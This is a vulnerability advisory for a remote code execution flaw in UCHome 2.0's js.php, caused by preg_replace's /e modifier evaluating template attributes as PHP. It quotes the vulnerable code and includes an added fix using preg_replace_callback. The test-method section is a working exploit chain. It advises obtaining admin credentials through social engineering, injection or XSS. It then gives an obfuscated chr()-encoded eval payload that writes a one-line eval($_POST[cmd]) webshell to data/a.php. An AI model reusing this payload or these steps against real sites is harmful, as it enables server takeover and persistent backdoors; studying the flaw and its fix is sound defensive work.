uchome 2.0 js.php remote code execution vulnerability

Vulnerability description: js.php in uchome <= 2.0 contains a code execution vulnerability. The regular-expression replacement is used incorrectly (the e modifier evaluates the replacement as PHP), so content submitted through the admin backend can be executed as PHP code.
 
Double-quoted strings in PHP:

 Variables inside a double-quoted string are parsed first, and only then is the result written out into the HTML.

 Single-quoted strings are not parsed; their contents are output directly.

Because the captured group \2 is placed inside double quotes when the replacement is evaluated, the submitted content is executed as code.
 
 
 
js.php:

        // (preceding code of js.php not shown)
        include template("data/blocktpl/$id");

        $obcontent = ob_get_contents();
        obclean();

        // The third pattern carries the e modifier: its replacement string is evaluated as PHP
        $s = array("/(\r|\n)/", "/<div\s+class=\"pages\">.+?<\/div>/is", "/\s+(href|src)=\"(.+?)\"/ie");
        // \2 (the attribute value) is pasted into a double-quoted PHP string and interpolated: this is where the code executes
        $r = array("\n", "", 'js_mkurl("\1", "\2")');

        $content = '';
        if($obcontent) {
                $obcontent = preg_replace($s, $r, $obcontent);
                $lines = explode("\n", $obcontent);
                foreach ($lines as $line) {
                        $line = addcslashes(trim($line), "/\\\'");
                        $content .= "document.writeln('$line');\n";
                }
        } else {
                $content .= "document.writeln('NO DATA');";
        }
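As an added example (not code from this advisory or from UCHome), the same link-rewriting step rewritten without the e modifier, so the attribute value is handed to a function as data instead of being evaluated; js_mkurl() is stubbed here because its real body is not on the page.

```php
<?php
// Added example: NOT code from the advisory or from UCHome. It shows the
// vulnerable replacement beside a fix that keeps the same rewriting behaviour.
// js_mkurl() is assumed to be UCHome's own helper; the stand-in below only
// exists so that this file runs on its own.
function js_mkurl($attr, $url) {
    // Stand-in: emits the attribute unchanged (the real helper rewrites URLs).
    return ' ' . $attr . '="' . $url . '"';
}

// Vulnerable form, as in js.php (PHP 5 only: the e modifier was deprecated in
// PHP 5.5 and removed in PHP 7.0). The third replacement is PHP source that
// preg_replace() evaluates after pasting the captured attribute value into a
// double-quoted string, so any value using PHP interpolation syntax is parsed
// and run instead of being treated as text.
function rewrite_links_vulnerable($html) {
    $s = array('/(\r|\n)/', '/<div\s+class="pages">.+?<\/div>/is', '/\s+(href|src)="(.+?)"/ie');
    $r = array("\n", '', 'js_mkurl("\1", "\2")');
    return preg_replace($s, $r, $html);
}

// Fixed form: preg_replace_callback() passes the captured groups to a real
// function as plain strings. Nothing from the template is ever parsed as PHP.
function rewrite_links_fixed($html) {
    $html = preg_replace('/(\r|\n)/', "\n", $html);
    $html = preg_replace('/<div\s+class="pages">.+?<\/div>/is', '', $html);
    return preg_replace_callback(
        '/\s+(href|src)="(.+?)"/i',
        function ($m) { return js_mkurl($m[1], $m[2]); },
        $html
    );
}

// Constructed sample: an attribute value written with PHP's interpolation
// syntax. With the fixed version it stays an inert string in the output.
$sample = '<a href="{$x}">a</a>';
$out = rewrite_links_fixed($sample);
echo $out, "\n";
// The value reached js_mkurl() unchanged and was never evaluated:
var_dump(strpos($out, '{$x}') !== false);
```

On PHP 7 and later the vulnerable function cannot run at all (the e modifier is rejected), which is itself a reason to keep such code off unsupported PHP 5 builds.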
 
Test environment:

System: Windows 2003 + IIS + PHP 5.2.9-2 + MySQL 5.0.67

Application: UCenter Home 2.0 (official) + UCenter 1.5 (official)
 
 
 
Test method:

I installed a fresh copy of uchome locally. The vulnerability requires administrator privileges: the admin password can be obtained through social engineering, injection, XSS or similar means, and then used to log in to the admin backend.

Then open admincp.php?ac=block&op=add and add a module. The module name can be anything; the defaults are fine. Then submit, as shown in the figure.

In the "Html code" field enter the following, then submit:
 
<a href="{${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}">a</a>

Decoded, the chr() sequence is: fputs(fopen('data/a.php','w'),'<?php eval($_POST[cmd])?>');
 
 
 
Check the ID of the newly added module. If the ID is 1, open js.php?id=1.
 
 
 
This writes a.php, a one-line webshell taking its code in the cmd parameter, into the data directory.
 
 
 
(In my case the ID was 2, so I visited js.php?id=2.)

Afterwards there is one more file, a.php, in the data directory.